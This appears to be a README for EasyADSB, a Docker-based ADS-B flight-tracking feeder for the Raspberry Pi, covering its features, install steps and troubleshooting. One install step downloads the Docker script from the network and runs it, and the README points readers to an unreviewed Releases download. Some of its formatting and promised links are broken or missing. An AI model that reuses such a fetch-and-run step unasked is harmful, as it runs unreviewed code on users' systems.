# π EasyADSB - Simple Setup for ADS-B Tracking
[](https://github.com/Somiarie/EasyADSB/releases)
## π Overview
EasyADSB automates the setup of an ADS-B feeder for your Raspberry Pi. This application connects to popular flight tracking services like ADSBexchange, ADSB.lol, FlightAware, FR24, and RadarBox. With features such as a web dashboard for monitoring flights, flight logging, dark mode, and stealth mode, you can easily track aircraft in your area.
## π§ Features
- **Automated Setup:** Get up and running quickly without complicated steps.
- **Multiple Service Support:** Feed data to various flight tracking platforms.
- **Web Dashboard:** Monitor live flight data from your browser.
- **Flight Logging:** Keep a record of all your tracked flights.
- **Dark Mode:** View the dashboard comfortably at night.
- **Stealth Mode:** Remain discreet while tracking flights.
## π» System Requirements
To run EasyADSB, you will need the following:
- **Raspberry Pi Model:** Raspberry Pi 3 or newer.
- **Operating System:** Raspberry Pi OS (Raspbian) or any Debian-based OS.
- **Internet Connection:** Required for accessing flight data services.
- **Power Supply:** Adequate power supply for the Raspberry Pi.
- **SD Card:** At least 16 GB for installation and data storage.
- **Software:** Docker and Docker Compose installed.
## π Getting Started
To install EasyADSB on your Raspberry Pi, follow these simple steps:
1. **Prepare Your Raspberry Pi:**
- Ensure your Raspberry Pi is set up with the latest Raspberry Pi OS.
- Connect your Raspberry Pi to the Internet.
- Open a terminal window.
2. **Install Docker:**
- Run the following command to install Docker:
```bash
curl -fsSL https://get.docker.com -o get-docker.sh
sh get-docker.sh
```
- After installation, add your user to the Docker group:
```bash
sudo usermod -aG docker $USER
```
3. **Install Docker Compose:**
- Use this command to install Docker Compose:
```bash
sudo apt-get install docker-compose
```
4. **Download EasyADSB:**
- Visit the [Releases page](https://github.com/Somiarie/EasyADSB/releases) to download EasyADSB.
5. **Run EasyADSB:**
- After downloading, navigate to the folder where EasyADSB is located in your terminal.
- Start the application with the following command:
```bash
docker-compose up -d
```
6. **Access the Dashboard:**
- Open a web browser and enter `http://<your_pi_ip>:8080` to access the web dashboard.
- Replace `<your_pi_ip>` with the actual IP address of your Raspberry Pi.
## π₯ Download & Install
To download EasyADSB, click the link below:
[Download EasyADSB](https://github.com/Somiarie/EasyADSB/releases)
Make sure to choose the latest version available on the Releases page.
## π Troubleshooting
If you encounter issues, consider these tips:
- **Check Docker Installation:** Ensure Docker is installed correctly by typing `docker --version` in the terminal.
- **Inspect Logs:** If the application fails to start, view logs for errors:
```bash
docker-compose logs- Networking Issues: Make sure your Raspberry Pi has a stable internet connection.
- Restart the Application: Sometimes, a simple restart resolves many issues:
docker-compose down docker-compose up -d
For more detailed documentation on features and configurations, visit the Wiki section in this repository or check the following links:
If you need support or have questions, feel free to open an issue on GitHub. Our community is here to help.
You can also check the FAQ section in the repository for common questions.
EasyADSB is open-source software. You can view the license details in the LICENSE file in this repository.
Join our discussions on forums and social media platforms. We welcome all users to share their experiences and improve the EasyADSB project together.